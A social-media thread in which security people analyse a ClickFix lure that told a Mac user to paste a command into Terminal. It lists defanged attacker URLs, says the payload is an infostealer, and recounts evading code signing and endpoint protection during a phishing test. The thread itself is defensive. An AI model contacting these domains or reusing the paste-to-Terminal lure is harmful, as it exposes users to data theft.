didnt even occur to me it's malware (of course it is, what would pasting a text string into Terminal do lol), I just assumed it's some new bullshit cloudflare is doing so I took a screenshot and closed the page - i went back and it did it again

copied the text and pasted it in to a text editor and this is what it is

@jpm @decryption @Viss yeah, this thing is probably some variant of clickfix. Usually they lure you with either a prompt that looks like something themed like a google error message, or more often, cloudflare. They dump either some form of bash or if Windows, some form of powershell that is designed to grab a malicious payload from another site and run it. Most often a RAT or an infostealer.

So, good judgement on not running that.

@jpm @decryption @Viss I tried OCR'ing the image, because I'm a lazy ass, but it failed, so I manually copied the base64. Reaches out to two domains. Well, one domain that's a subdomain of the other.

https[:]//sery.volcatomix.com/vpoPqfAqD5s7SHpf

https[:]//volcatomix.com/cl/index.php

#ClickFix #Malware

@jpm @decryption @Viss The first URL is a single pixel GIF. I don't know what its purpose is.

The second URL looks like an OSA script. My scroll buffer wasn't long enough to grab it all, but yeah, its definitely an info stealer.

Here are the relevant URLs that it interacts with:

https[:]//stradisamplix.com/api/health
https[:]//stradisamplix.com/api/data/recieve

take note of the X-Bid header as well.

#ClickFix #InfoStealer #MacOS

@da_667 @jpm @decryption oh man, this is interesting. i literally used almost exactly this technique on a gig i did last year for a company who wanted a phishing test.

da_667 is probably right on the money. i dont personally track the threat actors myself, but i pay keen attention to their techniques. the screenshots he posted scream infostealer to me. it just nabs shit from your system, zips it up, and ships it to the attacker

@da_667 @jpm @decryption but the infostealer stuff is getting big because defenses are getting fucking hard to bypass. like the gig i was on was a 2 week engagement, and i spent the entire fucking time, save 2 days, trying to get around apples codesigning requirements, googles spam filters, and various endpoint protection issues. i eventually bailed on trying to use any kinda sliver/msf/etc payload and just went with 'stupid bash'.

but it worked, like a champ.
shit sailed right through

@da_667 @jpm @decryption but in general, any website asking you to copypaste shit into the terminal is 100% shady.

and that includes every real website asking you to "curl pipe to bash". like rvm, homebrew, openclaw, and every other 'devops flavored' installer that asks you to "just trust us bro"

all that shit is a gigantic pietri dish for malware